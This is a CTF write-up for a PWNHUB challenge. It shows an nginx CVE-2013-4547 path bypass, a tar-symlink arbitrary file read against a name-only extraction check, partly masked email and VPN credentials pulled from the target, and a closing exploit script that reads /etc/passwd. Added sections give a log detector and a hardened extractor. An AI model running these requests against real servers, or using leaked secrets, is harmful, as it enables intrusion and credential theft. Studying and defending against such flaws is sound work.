PWNHUB / 2013 那年 (That Year, 2013) Writeup

0x00 Challenge Introduction

Details

Challenge address: 54.223.177.152:80

Updates

  • 2017.10.03 17:50:16 Hitting Discuz is not the goal. Who says a "chicken rib" (low-value) bug is useless? Look at Discuz for an assist.
  • 2017.10.03 11:24:40 Find a way to turn it into an arbitrary file read, but the flag is not there; treat it as a real penetration test!
  • 2017.10.02 15:45:49 Nginx has had plenty of problems, but it is a good server.

0x01 Nginx

Pitfalls all over the place; the best one:

Directory scanning found http://54.223.177.152/.DS_Store

  • index.html
  • upload[0x20]
  • index.php
  • admin
  • includes
  • config
  • pwnhub

CVE-2013-4547

GET /upload /../pwnhub/index.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
  </head>
  <body>
    <a href="../6c58c8751bca32b9943b34d0ff29bc16/index.php">get</a>
  </body>
</html>
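The request above relies on nginx's handling of an unescaped space in the request line (CVE-2013-4547): the path `/upload /../pwnhub/index.html` is evaluated differently by the location check and by the file lookup. As an added example (my own code, not part of this writeup), here is the detection a defender would run over nginx access logs: it parses the default "combined" format, flags any request line whose URI contains a raw space (a well-formed line has exactly three tokens: method, URI, version), and separately flags dot-dot segments in the path. The log lines are constructed for the demo; it assumes the standard `$request` field, which logs the request line as received.

```python
import re

# Constructed sample lines in nginx's default "combined" format (not real traffic);
# the second one carries the CVE-2013-4547 request shape shown in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Oct/2017:15:46:01 +0800] "GET /pwnhub/index.html HTTP/1.1" 403 169 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Oct/2017:15:46:09 +0800] "GET /upload /../pwnhub/index.html HTTP/1.1" 200 301 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Oct/2017:15:47:00 +0800] "GET /index.php?q=a b HTTP/1.1" 200 512 "-" "curl/7.55"
"""

# The request line is the first double-quoted field of the combined format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A dot-dot segment anywhere in the path portion.
DOTDOT_RE = re.compile(r'(^|/)\.\.(/|$)')


def parse_line(line):
    """Split one combined-format line into its fields, or return None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyse_request(request):
    """Inspect a raw request line such as 'GET /a /../b HTTP/1.1'.

    Returns (uri, findings). A well-formed request line has exactly three
    space-separated tokens (method, URI, version); any extra token means the
    client sent an unescaped space inside the URI, which is the shape that
    CVE-2013-4547 abuses. The URI is reassembled from everything between the
    method and the version so the dot-dot check sees the full path.
    """
    tokens = request.split(' ')
    findings = []
    if len(tokens) > 3:
        findings.append('unescaped-space-in-uri')
        uri = ' '.join(tokens[1:-1])
    elif len(tokens) >= 2:
        uri = tokens[1]
    else:
        uri = ''
    path = uri.split('?', 1)[0]  # ignore the query string for the traversal check
    if DOTDOT_RE.search(path):
        findings.append('dot-dot-traversal')
    return uri, findings


def scan_log(text):
    """Return one hit per flagged line: who sent it, what URI, what the server answered."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        uri, findings = analyse_request(rec['request'])
        if findings:
            hits.append({'ip': rec['ip'], 'uri': uri,
                         'status': rec['status'], 'findings': findings})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The status code is kept in each hit on purpose: in the sample the same client gets a 403 on the direct path and a 200 on the space-bearing one, and that pair is the clearest sign that a location restriction was bypassed rather than merely probed. A raw space in the query string alone (the third line) is malformed but far less interesting, so it only carries the first finding.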

0x02 Upload

Another round: http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/.DS_Store

Found untar.py

import tarfile
import sys
import uuid
import os


def untar(filename):
    os.chdir('/tmp/pwnhub/')
    t = tarfile.open(filename, 'r')
    for i in t.getnames():
        # Only the member *name* is checked: '..' must not appear and the
        # extension must be .cfg. The member type (symlink, hardlink, ...)
        # and the link target are never inspected.
        if '..' in i or '.cfg' != os.path.splitext(i)[1]:
            return 'error'
        else:
            try:
                t.extract(i, '/tmp/pwnhub/')
            except Exception, e:
                return e
            else:
                # The first extracted member is renamed to a random .cfg name
                # and returned; later members are never looked at.
                cfgName = str(uuid.uuid1()) + '.cfg'
                os.rename(i, cfgName)
                return cfgName

if __name__ == '__main__':
    filename = sys.argv[1]
    if not tarfile.is_tarfile(filename):
        exit('error')
    else:
        print untar(filename)

Build a tar whose member is a symlink and you get arbitrary file read: the check only looks at the member name, never at what it points to.
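The defect in untar.py is that it validates the member name and nothing else. As an added example (my own code, neither the writeup's nor the challenge's), here is the hardened counterpart a maintainer would ship: it refuses any member that is not a regular file, re-checks the .cfg extension, resolves the final path against the destination before anything is written, and only then extracts. It also shows that the page's name-only check accepts a symlink member called v.cfg. The archives are built in memory for the demo, and /outside/secret is a placeholder link target.

```python
import io
import os
import tarfile
import tempfile


def vulnerable_name_check(name):
    """The only check untar.py performs, ported from the page's Python 2:
    it inspects the member *name* and nothing else."""
    return not ('..' in name or os.path.splitext(name)[1] != '.cfg')


def safe_untar(archive, dest):
    """Extract only regular .cfg members that resolve inside dest.

    Every member is validated before anything is written. Raises ValueError on
    the first unsafe member and returns the extracted member names otherwise.
    """
    dest = os.path.realpath(dest)
    with tarfile.open(fileobj=archive, mode='r') as t:
        # Python 3.12+ (and the backports) ship a built-in 'data' filter with
        # the same intent; use it as a second layer where available.
        if hasattr(tarfile, 'data_filter'):
            t.extraction_filter = tarfile.data_filter
        members = t.getmembers()
        for m in members:
            # A symlink or hardlink named v.cfg satisfies the name check but
            # points wherever the archive author chose; refuse every member
            # that is not a plain file (links, directories, devices, FIFOs).
            if not m.isreg():
                raise ValueError('refusing non-regular member: %s' % m.name)
            if os.path.splitext(m.name)[1] != '.cfg':
                raise ValueError('refusing non-.cfg member: %s' % m.name)
            # Resolve the final path and require it to stay under dest; this
            # covers absolute names and '..' components, not just the substring.
            target = os.path.realpath(os.path.join(dest, m.name))
            if os.path.commonpath([dest, target]) != dest:
                raise ValueError('member escapes destination: %s' % m.name)
        for m in members:
            t.extract(m, dest)
    return [m.name for m in members]


def build_tar(members):
    """Constructed in-memory archive for the demo.

    members: iterable of (name, data, linkname); linkname not None makes a symlink.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w') as t:
        for name, data, linkname in members:
            info = tarfile.TarInfo(name)
            if linkname is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = linkname
                t.addfile(info)
            else:
                info.size = len(data)
                t.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def check_archive(archive, dest):
    """Run the hardened extractor; return ('ok', names) or ('error', reason)."""
    try:
        return 'ok', safe_untar(archive, dest)
    except ValueError as e:
        return 'error', str(e)


def run_checks():
    """Exercise both checks on constructed archives; returns a name -> outcome map."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        # The name-only check accepts 'v.cfg' no matter what kind of member it is.
        results['name_check_accepts_v.cfg'] = vulnerable_name_check('v.cfg')
        results['symlink'] = check_archive(
            build_tar([('v.cfg', None, '/outside/secret')]), d)[0]
        results['traversal'] = check_archive(
            build_tar([('../v.cfg', b'x', None)]), d)[0]
        results['wrong_ext'] = check_archive(
            build_tar([('v.txt', b'x', None)]), d)[0]
        status, names = check_archive(
            build_tar([('v.cfg', b'key=1\n', None)]), d)
        results['plain_cfg'] = status
        results['plain_cfg_names'] = names
        with open(os.path.join(d, 'v.cfg'), 'rb') as f:
            results['plain_cfg_content'] = f.read()
    return results


if __name__ == '__main__':
    for k, v in run_checks().items():
        print(k, v)
```

Two design points matter here. Validation runs over the whole member list before the first write, so a bad second member cannot leave a half-extracted tree behind; and the path check compares resolved real paths rather than searching for the substring `..`, which is what lets it catch absolute names and symlinked parent directories the original check never saw.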

0x03 VPN

/proc/mounts
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py

Email information:

mail_user = 'ctf_dicha@21cn.com'
mail_pass = '634DRaC62______'

VPN information:

Server IP: 54.223.177.152
IPsec PSK: dkQ97gGQPuVm83______
Username: pwnhub
Password: LE3U2aTgc4DGZd______

The school network is cursed...

0x04 End

In the end I didn't manage to solve it,

internal-network pentesting and the like, just not enough experience.

Only after reading the big shots' writeups did I learn that you had to scan Docker's default subnet.

C014 Pwnhub_2013那年.pdf

MARK
Docker uses 172.17.x.x as the container IP address range by default.

0x05 Exp Script

#!/usr/bin/env python2
# coding=utf-8

import os
import sys
import re
import requests as req
import urllib2
from tar_archive_with_symboliclink import _tarfile


URL = 'http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/index.php'

HEADERS = {
    'Origin': 'http://54.223.177.152',
    'User-Agent': 'Mozilla/5.0 AppleWebKit/537.75.14 (KHTML, like Gecko) Safari'
}

def exp_1():
    # CVE-2013-4547: a raw space in the path followed by /../ reaches the
    # pwnhub/ directory that a direct request is denied (see 0x01).
    _req = urllib2.Request(
        'http://54.223.177.152/upload\x20/../pwnhub/index.html')
    res = urllib2.urlopen(_req)
    print res.read()
    res.close()

def exp_2(fn=b'v.cfg', ln=b'/etc/passwd'):
    # Build a tar whose only member fn is a symlink to ln, upload it and pull
    # the extracted content out of the <textarea> in the response (see 0x02).
    # _tarfile (imported above) and upload_file are not shown in this excerpt.
    fd = _tarfile(fn, b'', ln)
    res = upload_file('v.tar', fd)
    if res:
        m = re.findall(
            r'<textarea cols="30" rows="15">(.*)</textarea>', res, re.M | re.S)
        if m:
            return m[0]
        else:
            return res
    else:
        return False